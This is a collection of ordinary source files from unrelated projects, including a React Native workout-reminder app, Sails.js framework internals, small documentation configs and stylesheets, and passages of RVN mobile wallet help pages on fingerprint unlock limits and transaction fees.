<TouchableWithoutFeedback
onPressIn={() => {
Animated.timing(
this.state.left,
{toValue: -WIDTH}
).start();
}}
>
<View
style={styles.sidebar__overlay}
>
<TouchableWithoutFeedback>
<Animated.View
style={[styles.sidebar, {left: this.state.left}]}>
<SidebarBody navigator={this.props.navigator}/>
</Animated.View>
</TouchableWithoutFeedback>
</View>
</TouchableWithoutFeedback>
);
}
}
const mapStateToProps = (state) => {
const { sidebar } = state;
return { sidebar };
};
const styles = StyleSheet.create({
sidebar: {
position: 'absolute',
top: 0,
left: 0,
bottom: 0,
width: 250,
overflow: 'hidden',
backgroundColor: '#eee'
},
sidebar__overlay: {
position: 'absolute',
top: 0,
right: 0,
bottom: 0,
left: 0,
backgroundColor: 'rgba(0,0,0,.3)'
},
});
export default connect(mapStateToProps)(Sidebar);
<|start_filename|>app/locales.js<|end_filename|>
import I18n from 'react-native-i18n';
import moment from 'moment';
I18n.fallbacks = true;
I18n.translations = {
'en-US': {
workout: 'Workout',
workouts: 'Workouts',
notification: 'Notification',
notifications: 'Notifications',
programs: 'Programs',
journal: 'Journal',
newNotification: 'New',
exercises: 'Exercises',
products: 'Products',
water: 'Water',
food: 'Food',
newFood: 'New',
profile: 'Profile',
add: 'Add',
edit: 'Edit',
close: 'Close',
done: 'Done',
will_remind_hour_before: `We'll remind you about the workout for 1 hour before the start.`
},
'ru': {
workout: 'Тренировка',
workouts: 'Тренировки',
notification: 'Напоминание',
notifications: 'Напоминания',
programs: 'Программы',
journal: 'Дневник',
newNotification: 'Новая',
exercises: 'Упражнения',
products: 'Продукты',
water: 'Вода',
food: 'Питание',
newFood: 'Новая',
profile: 'Профиль',
add: 'Добавить',
edit: 'Изменить',
close: 'Закрыть',
done: 'Готово',
will_remind_hour_before: 'Мы напомним вам о тренировке за один час до начала.'
}
}
if (!I18n.locale.match(/en/)) {
let ruLocale = require('moment/locale/ru');
moment.updateLocale('ru', ruLocale);
}
export default I18n;
export { I18n, moment };
<|start_filename|>app/components/sidebar-body.js<|end_filename|>
import React, { Component } from 'react';
import MaterialIcons from 'react-native-vector-icons/MaterialIcons';
import I18n from './../locales';
import { connect } from 'react-redux';
import { goTo } from './../actions';
import {
StyleSheet,
StatusBar,
TouchableHighlight,
Text,
View
} from 'react-native';
class SidebarBody extends Component {
render() {
const { dispatch } = this.props;
return (
<View style={{flex: 1, paddingTop: 50}}>
<TouchableHighlight underlayColor='#fff' onPress={() => dispatch(goTo('workouts'))}>
<View style={[styles.menuItem, styles.menuItemFirst]}>
<MaterialIcons name='fitness-center' color='#333' size={25} />
<Text style={styles.menuItemText}>{I18n.t('workouts')}</Text>
</View>
</TouchableHighlight>
<TouchableHighlight underlayColor='#fff' onPress={() => dispatch(goTo('food'))}>
<View style={styles.menuItem}>
<MaterialIcons name='restaurant' color='#333' size={25} />
<Text style={styles.menuItemText}>{I18n.t('food')}</Text>
</View>
</TouchableHighlight>
<TouchableHighlight underlayColor='#fff' onPress={() => dispatch(goTo('profile'))}>
<View style={styles.menuItem}>
<MaterialIcons name='face' color='#333' size={25} />
<Text style={styles.menuItemText}>{I18n.t('profile')}</Text>
</View>
</TouchableHighlight>
</View>
);
}
}
const styles = StyleSheet.create({
menuItem: {
padding: 15,
flexDirection: 'row',
borderBottomWidth: 1,
borderBottomColor: '#ccc'
},
menuItemFirst: {
borderTopWidth: 1,
borderTopColor: '#ccc'
},
menuItemText: {
marginTop: 4,
marginLeft: 15,
}
});
const mapStateToProps = (state) => {
return { }
}
export default connect(mapStateToProps)(SidebarBody);
<|start_filename|>app/components/workouts.js<|end_filename|>
import React, { Component } from 'react';
import I18n from './../locales';
import { connect } from 'react-redux';
import { loadNotifications } from './../actions';
import Ionicons from 'react-native-vector-icons/Ionicons';
import {
Notifications,
Layout
} from './';
import {
PushNotificationIOS,
ActivityIndicatorIOS,
StyleSheet,
TabBarIOS,
Text,
Image,
View,
ScrollView,
ListView,
Modal,
TouchableHighlight
} from 'react-native';
class Workouts extends Component {
constructor(props) {
super(props);
this.state = {selected: 'programs'};
}
componentDidMount() {
PushNotificationIOS.requestPermissions();
}
render() {
return (
<TabBarIOS
unselectedTintColor='white'
tintColor='#000'
barTintColor='#fff'>
<Ionicons.TabBarItemIOS
title={I18n.t('programs')}
iconName='ios-locate-outline'
selectedIconName='ios-locate'
selected={this.state.selected === 'programs'}
onPress={() => {
this.setState({selected: 'programs'});
}}>
<Layout
menu={I18n.t('workouts')}
title={I18n.t('programs')}>
<ScrollView style={{flex: 1, marginBottom: 49}} automaticallyAdjustContentInsets={false}>
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')}>
<View>
<Text style={{position: 'absolute', bottom: 15, left: 15}}>Программа "Рельеф"</Text>
</View>
</Image>
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')} />
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')} />
<Image style={{width: null, height: 100}} resizeMode='cover' source={require('./../images/program.png')} />
</ScrollView>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('journal')}
iconName='ios-calendar-outline'
selectedIconName='ios-calendar'
selected={this.state.selected === 'journal'}
onPress={() => {
this.setState({selected: 'journal'});
}}>
<Layout
menu={I18n.t('workouts')}
image={require('./../images/layout2.png')}
title={I18n.t('journal')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('exercises')}
iconName='ios-list-box-outline'
selectedIconName='ios-list-box'
selected={this.state.selected === 'list'}
onPress={() => {
this.setState({selected: 'list'});
}}>
<Layout
menu={I18n.t('workouts')}
image={require('./../images/layout3.png')}
title={I18n.t('exercises')}>
</Layout>
</Ionicons.TabBarItemIOS>
<Ionicons.TabBarItemIOS
title={I18n.t('notifications')}
iconName='ios-alarm-outline'
selectedIconName='ios-alarm'
selected={this.state.selected === 'notifications'}
onPress={() => {
this.setState({selected: 'notifications'});
}}>
<Notifications menu={I18n.t('workouts')} />
</Ionicons.TabBarItemIOS>
</TabBarIOS>
);
}
}
const mapStateToProps = (state) => {
return {}
}
export default connect(mapStateToProps)(Workouts)
<|start_filename|>app/containers/main.js<|end_filename|>
import React, { Component } from 'react';
import {
Workouts,
Food,
Profile,
Sidebar
} from './../components';
import { connect } from 'react-redux';
import {
View
} from 'react-native';
class Main extends Component {
renderLocation(location) {
switch (location) {
case 'workouts':
return <Workouts />;
case 'food':
return <Food />;
case 'profile':
return <Profile />;
default:
return <Workouts />;
}
}
render() {
const { dispatch, sidebar, location } = this.props;
return (
<View style={{flex: 1}}>
{ this.renderLocation(location) }
{ sidebar &&
<Sidebar />
}
</View>
);
}
}
const mapStateToProps = (state) => {
const { sidebar, location } = state;
return { sidebar, location }
}
export default connect(mapStateToProps)(Main);
<|start_filename|>app/components/nav-button.js<|end_filename|>
import React, { Component } from 'react';
import {
StyleSheet,
Text,
TouchableOpacity
} from 'react-native';
export default class NavButton extends Component {
render() {
return (
<TouchableOpacity
onPress={this.props.onPress}>
<Text style={[styles.button, this.props.right ? styles.button_r : {}]}>{this.props.name}</Text>
</TouchableOpacity>
)
}
}
const styles = StyleSheet.create({
button: {
paddingTop: 10,
paddingBottom: 10,
paddingLeft: 5,
paddingRight: 5,
color: '#fff',
fontSize: 14,
textAlign: 'left'
},
button_r: {
textAlign: 'right'
}
});
<|start_filename|>app/reducers.js<|end_filename|>
import { combineReducers } from 'redux';
const notifications = (state = {
items: []
}, action) => {
switch (action.type) {
case 'GET_NOTIFICATIONS':
return {
items: action.notifications
}
default:
return state
}
};
const newNotificationPopup = (state = {
open: false
}, action) => {
switch (action.type) {
case 'OPEN_NEW_NOTIFICATION_POPUP':
return Object.assign({}, state, {
open: true
});
case 'CLOSE_NEW_NOTIFICATION_POPUP':
return Object.assign({}, state, {
open: false
});
default:
return state;
}
};
const editNotifications = (state = false, action) => {
switch (action.type) {
case 'ENABLE_EDIT_NOTIFICATIONS':
return true;
case 'DISABLE_EDIT_NOTIFICATIONS':
return false;
default:
return state;
}
};
const editModeNotifications = (state = false, action) => {
switch (action.type) {
case 'ENABLE_EDIT_MODE_NOTIFICATIONS':
return true;
case 'DISABLE_EDIT_MODE_NOTIFICATIONS':
return false;
default:
return state;
}
};
const sidebar = (state = false, action) => {
switch (action.type) {
case 'OPEN_SIDEBAR':
return true;
case 'CLOSE_SIDEBAR':
return false;
default:
return state;
}
};
const location = (state = 'workouts', action) => {
switch (action.type) {
case 'GOTO':
return action.location;
default:
return state;
}
};
const rootReducer = combineReducers({
notifications,
newNotificationPopup,
editModeNotifications,
editNotifications,
sidebar,
location
});
export default rootReducer;
<|start_filename|>app/actions.js<|end_filename|>
import I18n, { moment } from './locales';
import { generateUUID } from './utils';
import {
PushNotificationIOS,
AsyncStorage
} from 'react-native';
const openNewNotificationPopup = () => {
return (dispatch, getState) => {
dispatch({
type: 'OPEN_NEW_NOTIFICATION_POPUP'
});
};
};
const closeNewNotificationPopup = () => {
return (dispatch, getState) => {
dispatch({
type: 'CLOSE_NEW_NOTIFICATION_POPUP'
});
};
};
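// Persists a new notification in AsyncStorage (kept sorted by date) and, if the
// workout is in the future, schedules a local iOS push notification one hour
// before it, tagging it with the notification's uuid so removeNotification can
// cancel it later.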
const addNotification = date => {
return (dispatch, getState) => {
let notification = {
uuid: generateUUID(),
date: date
};
AsyncStorage.getItem('notifications', (err, notifications) => {
if (notifications && JSON.parse(notifications).length > 0) {
notifications = [...JSON.parse(notifications), notification].sort((a, b) =>
new Date(a.date) - new Date(b.date)
)
} else {
notifications = [notification];
}
AsyncStorage.setItem('notifications', JSON.stringify(notifications), () => {
if (notifications.length > 0) {
dispatch(enableEditNotifications());
}
dispatch({
type: 'GET_NOTIFICATIONS',
notifications: notifications
});
let fireDate = moment(notification.date)
.subtract(1, 'hour')
.set('second', 0)
.toDate();
if (notification.date > new Date()) {
PushNotificationIOS.scheduleLocalNotification({
fireDate: fireDate.getTime(),
alertBody: `${I18n.t('notification')}: ${moment(notification.date).calendar()}`,
userInfo: { uuid: notification.uuid }
});
}
});
});
};
};
const getNotifications = () => {
return (dispatch, getState) => {
AsyncStorage.getItem('notifications', (err, notifications) => {
if (!err && notifications) {
dispatch({
type: 'GET_NOTIFICATIONS',
notifications: JSON.parse(notifications).sort((a, b) =>
new Date(a.date) - new Date(b.date)
)
});
if (getState().notifications.items.length > 0) {
dispatch(enableEditNotifications());
} else {
dispatch(disableEditNotifications());
}
}
});
};
};
const enableEditModeNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'ENABLE_EDIT_MODE_NOTIFICATIONS'
});
};
};
const disableEditModeNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'DISABLE_EDIT_MODE_NOTIFICATIONS'
});
};
};
const enableEditNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'ENABLE_EDIT_NOTIFICATIONS'
});
};
};
const disableEditNotifications = () => {
return (dispatch, getState) => {
dispatch({
type: 'DISABLE_EDIT_NOTIFICATIONS'
});
};
};
const removeNotification = (notification) => {
return (dispatch, getState) => {
AsyncStorage.getItem('notifications', (err, notifications) => {
if (notifications && JSON.parse(notifications).length > 0) {
let filtered_notifications = JSON.parse(notifications).filter((i) => i.uuid != notification.uuid);
notifications = filtered_notifications.sort((a, b) =>
new Date(a.date) - new Date(b.date)
)
} else {
notifications = [];
}
AsyncStorage.setItem('notifications', JSON.stringify(notifications), () => {
PushNotificationIOS.cancelLocalNotifications({uuid: notification.uuid});
dispatch({
type: 'GET_NOTIFICATIONS',
notifications: notifications
});
if (notifications.length === 0) {
dispatch(disableEditModeNotifications());
dispatch(disableEditNotifications());
}
});
});
};
};
const openSidebar = () => {
return (dispatch, getState) => {
dispatch({
type: 'OPEN_SIDEBAR'
});
};
};
const closeSidebar = () => {
return (dispatch, getState) => {
dispatch({
type: 'CLOSE_SIDEBAR'
});
};
};
const goTo = (location) => {
return (dispatch, getState) => {
dispatch(closeSidebar());
dispatch({
type: 'GOTO',
location
});
};
};
export {
openNewNotificationPopup,
closeNewNotificationPopup,
addNotification,
getNotifications,
enableEditNotifications,
disableEditNotifications,
enableEditModeNotifications,
disableEditModeNotifications,
removeNotification,
openSidebar,
closeSidebar,
goTo
};
| ivanzotov/react-native-example |
<|start_filename|>doc/source/_static/baobab.css<|end_filename|>
.class .method, .class .staticmethod{
border-bottom:1px dotted black;
}
div.warning p.admonition-title {
background-color:#EDD26A;
color:#AD3535;
}
div.warning {
border-color:#776C0B;
}
.field-name {
white-space:nowrap;
}
.download-button {
-moz-border-radius: 4px 4px 4px 4px;
-moz-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.3);
-webkit-border-radius: 4px 4px 4px 4px;
-webkit-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.3);
border-radius: 4px 4px 4px 4px;
box-shadow: 0 1px 4px rgba(0, 0, 0, 0.3);
background: -moz-linear-gradient(center top , #50B7D1, #286DA3) repeat scroll 0 0 transparent;
border: 1px solid #51A0B3;
color: white;
display: inline-block;
font-size: 14px;
font-weight:bold;
padding: 8px 20px;
text-shadow: -1px -1px 0 rgba(0, 0, 0, 0.25);
outline: medium none;
}
.download-button:hover {
background: -moz-linear-gradient(-90deg, #66C7E5, #328FC9) repeat scroll 0 0 transparent;
text-decoration: none;
color:white;
}
#main_bar {
background-color: black;
color: #FFFFFF;
font-family: cursive;
font-size: 40px;
padding: 5px;
text-align: left;
}
#main_bar img{
vertical-align:middle;
}
#main_bar .sp_text{
color:white;
}
.clearLeft {
clear:left;
}
.tree-example {
padding:15px 0 0 0;
}
.tree-example img.animals {
float:left;
}
.tree-example table.animals {
margin-left:35px;
float:left;
}
.half {
width:50%;
float:left;
}
div.sphinxsidebar ul ul, div.sphinxsidebar ul.want-points {
word-wrap: break-word;
}
#sql-api .section {
border-bottom: 1px dashed black;
margin-bottom:5px;
}
#sql-api .section h2 {
font-size:1.2em;
} | ljubodrag/Baobab |
<|start_filename|>website/sidebars.js<|end_filename|>
module.exports = {
apiSidebar: {},
wikiSidebar: {
'Getting started': [
'wiki/installation',
'wiki/stub-generation',
'wiki/starting-server',
'wiki/basic-middleware',
],
Features: [
'wiki/middlewares',
'wiki/metadata',
'wiki/error-handling',
'wiki/caching',
'wiki/client',
],
},
}
<|start_filename|>typedoc.json<|end_filename|>
{
"inputFiles": ["./src/lib"],
"exclude": ["./src/lib/misc/*"],
"mode": "file",
"theme": "docusaurus2",
"plugin": "typedoc-plugin-markdown",
"readme": "none",
"stripInternal": true
}
| Cheerazar/protocat |
<|start_filename|>lib/hooks/http/middleware/load.js<|end_filename|>
/**
* Module dependencies
*/
var _ = require('lodash');
/**
* `use` middleware in the correct order.
*
* @param {express.app} app
* @param {Object} wares - dictionary of preconfigured middleware
* @param {sails.app} sails
*/
module.exports = function builtInMiddlewareLoader (app, wares, sails) {
_.each(sails.config.http.middleware.order, function (middlewareKey) {
// Special case:
// allows for injecting a custom function to attach middleware:
if (middlewareKey === '$custom' && sails.config.http.customMiddleware) {
sails.config.http.customMiddleware(app);
}
// Otherwise, just use the middleware normally.
if (wares[middlewareKey]) app.use(wares[middlewareKey]);
});
};
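// Illustrative project-level config (the file path and middleware body are
// assumptions; `customMiddleware` is the option consumed by the `$custom`
// slot above). For example, in `config/http.js`:
//
//   module.exports.http = {
//     customMiddleware: function (app) {
//       app.use(function (req, res, next) {
//         // e.g. attach request-scoped state, custom logging, etc.
//         return next();
//       });
//     }
//   };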
<|start_filename|>lib/hooks/orm/lookup-datastore.js<|end_filename|>
/**
* Module dependencies
*/
var Err = require('../../../errors');
// TODO: use this again so we get a normalized error
// (currently it's not being used anywhere)
/**
* Lookup a datastore/connection (e.g., `{ adapter: 'sails-disk' }`)
* by name (e.g., 'devDB')
*
* @param {String} connectionName
*
* @param {String} modelID
* // Optional, improves quality of error messages
*
* @global sails
* sails.config
* sails.config.connections {}
*
* @throws {Err.fatal} __UnknownConnection__
* @api private
*/
module.exports = function howto_lookupDatastore(sails){
return function lookupDatastore(connectionName, modelID) {
var connection = sails.config.connections[connectionName];
// If this is not a known connection, throw a fatal error.
if (!connection) {
return Err.fatal.__UnknownConnection__(connectionName, modelID);
}
return connection;
};
};
<|start_filename|>lib/app/private/toJSON.js<|end_filename|>
/**
* Module dependencies
*/
var util = require('util');
var _ = require('lodash');
/**
 * Serialize this Sails app into a plain object suitable for JSON output,
 * keeping its `config`, the identities of its loaded hooks, and trimmed-down
 * metadata for its models (junction tables are omitted).
 * @return {Object}
*/
module.exports = function toJSON () {
return _.reduce(this, function (pojo, val, key) {
if (key === 'config') {
pojo[key] = val;
}
if (key === 'hooks') {
pojo[key] = _.reduce(val, function (memo, hook, ident) {
memo.push(ident);
return memo;
}, []);
}
if (key === 'models') {
pojo[key] = _.reduce(val, function (memo, model, ident) {
if (!model.junctionTable) {
memo.push({
attributes: model.attributes,
identity: model.identity,
globalId: model.globalId,
connection: model.connection,
schema: model.schema,
tableName: model.tableName
});
}
return memo;
}, []);
}
return pojo;
}, {});
};
<|start_filename|>lib/index.js<|end_filename|>
/**
* Module dependencies
*/
var Sails = require('./app');
// Instantiate and expose a Sails singleton
// (maintains legacy support)
module.exports = new Sails();
// Expose constructor for convenience/tests
module.exports.Sails = Sails;
// To access the Sails app constructor, do:
// var Sails = require('sails').constructor;
// var newApp = new Sails();
// Or to get a factory method which generates new instances:
// var Sails = require('sails/lib/app');
// var newApp = Sails();
<|start_filename|>lib/app/private/after.js<|end_filename|>
/**
* Module dependencies
*/
var _ = require('lodash');
var async = require('async');
//
// TODO
// Pull this into a separate module, since it's not specific to Sails.
//
/**
* Mix-in an `after` function to an EventEmitter.
*
* If `events` have already fired, trigger fn immediately (with no args)
* Otherwise bind a normal one-time event using `EventEmitter.prototype.once()`.
* Useful for checking whether or not something has finished loading, etc.
*
* This is a lot like jQuery's `$(document).ready()`.
*
* @param {EventEmitter} emitter
*/
module.exports = function mixinAfter(emitter) {
/**
* { emitter.warmEvents }
*
* Events which have occurred at least once
* (Required to support `emitter.after()`)
*/
emitter.warmEvents = {};
/**
* emitter.emit()
*
* Override `EventEmitter.prototype.emit`.
* (Required to support `emitter.after()`)
*/
var _emit = _.clone(emitter.emit);
emitter.emit = function(evName) {
var args = Array.prototype.slice.call(arguments, 0);
emitter.warmEvents[evName] = true;
_emit.apply(emitter, args);
};
/**
* `emitter.after()`
*
* Fires your handler **IF THE SPECIFIED EVENT HAS ALREADY BEEN TRIGGERED** or **WHEN IT IS TRIGGERED**.
*
* @param {String|Array} events [name of the event(s)]
* @param {Function} fn [event handler function]
* @context {Sails}
*/
emitter.after = function(events, fn) {
// Support a single event or an array of events
if (!_.isArray(events)) {
events = [events];
}
// Convert named event dependencies into an array
// of async-compatible functions.
var dependencies = _.reduce(events,
function(dependencies, event) {
var handlerFn = function(cb) {
if (emitter.warmEvents[event]) {
cb();
} else {
emitter.once(event, cb);
}
};
dependencies.push(handlerFn);
return dependencies;
}, []);
// When all events have fired, call `fn`
// (all arguments passed to `emit()` calls are discarded)
async.parallel(dependencies, function(err) {
if (err) sails.log.error(err);
return fn();
});
};
};
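A small usage sketch with hypothetical event names; once mixed in, `after()` fires the handler immediately for events that have already happened and waits on the rest:

// Illustrative sketch only; the event names are hypothetical.
var EventEmitter = require('events').EventEmitter;
var mixinAfter = require('./after');

var emitter = new EventEmitter();
mixinAfter(emitter);

emitter.emit('hook:orm:loaded'); // fires before any handler is registered

emitter.after(['hook:orm:loaded', 'hook:http:loaded'], function () {
  // Runs only after both events: the first is already in warmEvents,
  // the second is awaited with emitter.once().
  console.log('both hooks are ready');
});

emitter.emit('hook:http:loaded'); // completes the second dependency; handler fires now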
<|start_filename|>lib/hooks/blueprints/onRoute.js<|end_filename|>
/**
* Module dependencies.
*/
var _ = require('lodash'),
util = require('sails-util');
// NOTE:
// Since controllers load blueprint actions by default anyways, this route syntax handler
// can be replaced with `{action: 'find'}, {action: 'create'}, ...` etc.
/**
* Expose route parser.
* @type {Function}
*/
module.exports = function (sails) {
return interpretRouteSyntax;
/**
* interpretRouteSyntax
*
* "Teach" router to understand direct references to blueprints
* as a target to sails.router.bind()
* (i.e. in the `routes.js` file)
*
* @param  {Object} route  route descriptor with `target`, `path`, `verb` and `options`
* @return {undefined}
* @api private
*/
function interpretRouteSyntax (route) {
var target = route.target,
path = route.path,
verb = route.verb,
options = route.options;
// Support referencing blueprints in explicit routes
// (`{ blueprint: 'create' }` et al.)
if (
_.isObject(target) &&
!_.isFunction(target) &&
!_.isArray(target) &&
_.isString(target.blueprint)) {
// On a match, merge leftover items in the target object into route options:
options = _.merge(options, _.omit(target, 'blueprint'));
return bindBlueprintAction(path, target.blueprint, verb, options);
}
// Ignore unknown route syntax
// If it needs to be understood by another hook, the hook would have also received
// the typeUnknown event, so we're done.
return;
}
/**
* Bind explicit route to a blueprint action.
*
* @param  {String} path               route path to bind
* @param  {String} blueprintActionID  name of the blueprint action (e.g. 'find')
* @param  {String} verb               HTTP verb for the route
* @param  {Object} options            route options (model, associations, populate, ...)
* @return {undefined}
* @api private
*/
function bindBlueprintAction ( path, blueprintActionID, verb, options ) {
// Look up appropriate blueprint action and make sure it exists
var blueprint = sails.middleware.blueprints[blueprintActionID];
// If a 'blueprint' was specified, but it doesn't exist, warn the user and ignore it.
if ( ! ( blueprint && _.isFunction(blueprint) )) {
sails.log.error(
blueprintActionID,
':: Ignoring attempt to bind route (' + path + ') to unknown blueprint action (`'+blueprintActionID+'`).'
);
return;
}
// If a model wasn't provided with the options, try and guess it
if (!options.model) {
var matches = path.match(/^\/(\w+).*$/);
if (matches && matches[1] && sails.models[matches[1]]) {
options.model = matches[1];
}
else {
sails.log.error(
blueprintActionID,
':: Ignoring attempt to bind route (' + path + ') to blueprint action (`'+blueprintActionID+'`), but no valid model was specified and we couldn\'t guess one based on the path.'
);
return;
}
}
// If associations weren't provided with the options, try and get them
if (!options.associations) {
options = _.merge({ associations: _.cloneDeep(sails.models[options.model].associations) }, options);
}
// Otherwise make sure it's an array of strings of valid association aliases
else {
options.associations = options.associations.map(function(alias) {
if (typeof(alias) != 'string') {
sails.log.error(
blueprintActionID,
':: Ignoring invalid association option for '+path+'.'
);
return;
}
var association;
if (!(association = _.findWhere(sails.models[options.model].associations, {alias: alias}))) {
sails.log.error(
blueprintActionID,
':: Ignoring invalid association option `'+alias+'` for '+path+'.'
);
return;
}
return association;
});
}
// If "populate" wasn't provided in the options, use the default
if (typeof (options.populate) == 'undefined') {
options.populate = sails.config.blueprints.populate;
}
sails.router.bind(path, blueprint, verb, options);
return;
}
};
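A sketch of the route syntax this handler understands, for example in a project's `config/routes.js`; the paths and model name below are hypothetical:

// config/routes.js (illustrative sketch only)
module.exports.routes = {
  // Bound via bindBlueprintAction(): path '/user', blueprint 'find', verb 'get'.
  // No model is given, so it is guessed from the first path segment ('user').
  'get /user': { blueprint: 'find' },

  // Leftover keys besides `blueprint` (model, populate) are merged into the route options.
  'post /admin/users': { blueprint: 'create', model: 'user', populate: false }
};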
| kevinburke/sails |
<|start_filename|>mobilewallet/support/security/fingerprint.html<|end_filename|>
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>What is fingerprint authentication?</title>
<link href="../css/style.css" rel="stylesheet" type="text/css">
<!--Template Stylesheet-->
<link href="css/elements-style.css" rel="stylesheet" type="text/css">
<!--Template Elements Stylesheet-->
<link href="css/font-awesome.css" rel="stylesheet">
<!-- Font Awesome v5 -->
<link href="https://fonts.googleapis.com/css?family=Questrial" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Poppins" rel="stylesheet">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.2/modernizr.js"></script>
</head>
<style type="text/css">
h3 {
font-family: 'Poppins', sans-serif;
font-size: 16px;
font-weight: 900;
color: #ff784c; margin-top: 1em;
margin-bottom: 1em; }
</style>
<body>
<div class="se-pre-con"></div>
<!-- start Site Header -->
<header class="site-header">
<div class="wrapper">
<!-- start site logo-->
<div class="site-logo">
<a href="index.html"><img style="max-width: 30px;/* margin-right: 127px; */" src="../images/back.svg"></a>
<a href=""><img style=" margin-left: 80px; " src="../images/RVN@3x.png" alt="logo"> </a>
</div>
</div>
<!-- end wrapper -->
</header>
<!-- end site header -->
<!-- Site Content -->
<div class="content main-container" id="site-content">
<!-- start wrapper -->
<div class="wrapper">
<!-- start featured box -->
<div class="featured-box">
<div class="container">
<div class="row">
<div class="col">
<h3>What is fingerprint authentication? </h3>
</div>
</div>
<p>Touch ID on iPhone<br />
Touch ID is available on any iPhone 5s or later, iPad Pro, iPad Air 2, or iPad mini 3 or later. If you have it enabled on your device, you can use your fingerprint to unlock your RVN Wallet and authorize transactions instead of entering your passcode. You will still be required to enter your passcode periodically for increased security.<br />
If Touch ID is not enabled on your device, you can enable it in your device's settings under "Touch ID & Passcode".<br />
<br />Fingerprint Authorization on Android<br />
Many Android devices feature a fingerprint reader. You can use your fingerprint to unlock your RVN Wallet and authorize transactions instead of entering your passcode. You will still be required to enter your passcode periodically for increased security.<br />
In order to use this feature in the RVN Wallet, fingerprint authorization must be enabled on your device. See the phone manufacturer's manual for more information.<br />
<br />What is the fingerprint/touch ID spending limit?<br />
The Touch ID option in the RVN Wallet’s Security Center allows you to conveniently unlock your RVN Wallet and send money up to a set limit using your fingerprint.<br />
Security experts have proved it is possible to lift fingerprints from a stolen device and use them to trick that device's fingerprint reader into unlocking the device, so this is not a strong security solution.<br />
To ensure the majority of your funds are safe in the event your phone is stolen, the RVN Wallet sets a limit on the amount of money that can be sent with only a fingerprint. If you or anyone else tries to send more than that limit (cumulative), your wallet passcode will be required.<br />
You can change the limit by choosing Fingerprint Authorization Limit in the RVN Wallet settings.<br />
NOTE: Before enabling this in the RVN Wallet, make sure that you have enabled Touch ID in your iOS device settings or the Fingerprint Authorization on your Android device. Review your phone manufacturer’s manual for more information on this.<br />
If Touch ID or Fingerprint Authorization has been enabled on your device settings, follow these steps to enable Touch ID in the RVN Wallet:<br />
<br />Tap on Menu in the main screen.<br />
Select Security Settings.<br />
Choose Touch ID.<br />
Tap the switch button to enable Touch ID for RVN Wallet.<br />
Tap on the link for Touch ID Spending Limit Screen.<br />
Enter your PIN.<br />
Select from one of the limit options provided on the screen. When done, tap the arrow in the top left to return to the settings menu.
</p>
</div>
</div>
</div>
<!-- start site footer -->
<footer class="site-footer">
<div class="wrapper">
<!-- start site footer bottom -->
<div class="site-footer-bottom">
<p>Please review our <br /> <a href="https://ravencoin.org/mobilewallet/support/terms.html">Terms of Use </a> - <a href="https://ravencoin.org/mobilewallet/support/privacy.html">Privacy Policy</a></p>
</div>
<!-- end site footer bottom-->
</div>
<!--wrapper-->
</footer>
</body>
<!-- end site footer -->
<script type="text/javascript"> $(window).load(function() {
// Animate loader off screen
$(".se-pre-con").fadeOut("slow");;
});
</script>
</html>
<|start_filename|>mobilewallet/support/Troubleshooting/Insufficient-funds.html<|end_filename|>
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Why am I getting an "Insufficient funds" error?</title>
<link href="../css/style.css" rel="stylesheet" type="text/css">
<!--Template Stylesheet-->
<link href="css/elements-style.css" rel="stylesheet" type="text/css">
<!--Template Elements Stylesheet-->
<link href="css/font-awesome.css" rel="stylesheet">
<!-- Font Awesome v5 -->
<link href="https://fonts.googleapis.com/css?family=Questrial" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Poppins" rel="stylesheet">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.2/modernizr.js"></script>
</head>
<style type="text/css">
h3 {
font-family: 'Poppins', sans-serif;
font-size: 16px;
font-weight: 900;
color: #ff784c; margin-top: 1em;
margin-bottom: 1em; }
</style>
<body>
<div class="se-pre-con"></div>
<!-- start Site Header -->
<header class="site-header">
<div class="wrapper">
<!-- start site logo-->
<div class="site-logo">
<a href="index.html"><img style="max-width: 30px;/* margin-right: 127px; */" src="../images/back.svg"></a>
<a href=""><img style=" margin-left: 80px; " src="../images/RVN@3x.png" alt="logo"> </a>
</div>
</div>
<!-- end wrapper -->
</header>
<!-- end site header -->
<!-- Site Content -->
<div class="content main-container" id="site-content">
<!-- start wrapper -->
<div class="wrapper">
<!-- start featured box -->
<div class="featured-box">
<div class="container">
<div class="row">
<div class="col">
<h3>Why am I getting an "Insufficient funds" error?</h3>
</div>
</div>
<p>The RVN Wallet does not charge any fees to send a transaction. However, the Ravencoin network requires a "transaction fee". The cost of this fee varies as the price of Ravencoin changes and congestion on the network increases.
When sending a transaction, you need to make sure that you have enough funds in your wallet to cover the necessary transaction fee. Otherwise, an “Insufficient funds” error occurs.
When sending Ravencoin, fees are not calculated from the amount of money you are sending but from the amount of data attached to your transaction. On top of the amount being sent, this data includes information about where the funds came from and where they are being sent.
If you are sending funds that arrived as several smaller transactions, all of the information from those smaller transactions needs to be referenced in the new transaction. This increases the data size of the new transaction and can multiply the fee several times over, depending on how large that data is. Sending a smaller transaction may help in this case. Also, if you receive small transactions regularly, you may want to arrange for larger and less frequent payments instead.
</p>
</div>
</div>
</div>
<!-- start site footer -->
<footer class="site-footer">
<div class="wrapper">
<!-- start site footer bottom -->
<div class="site-footer-bottom">
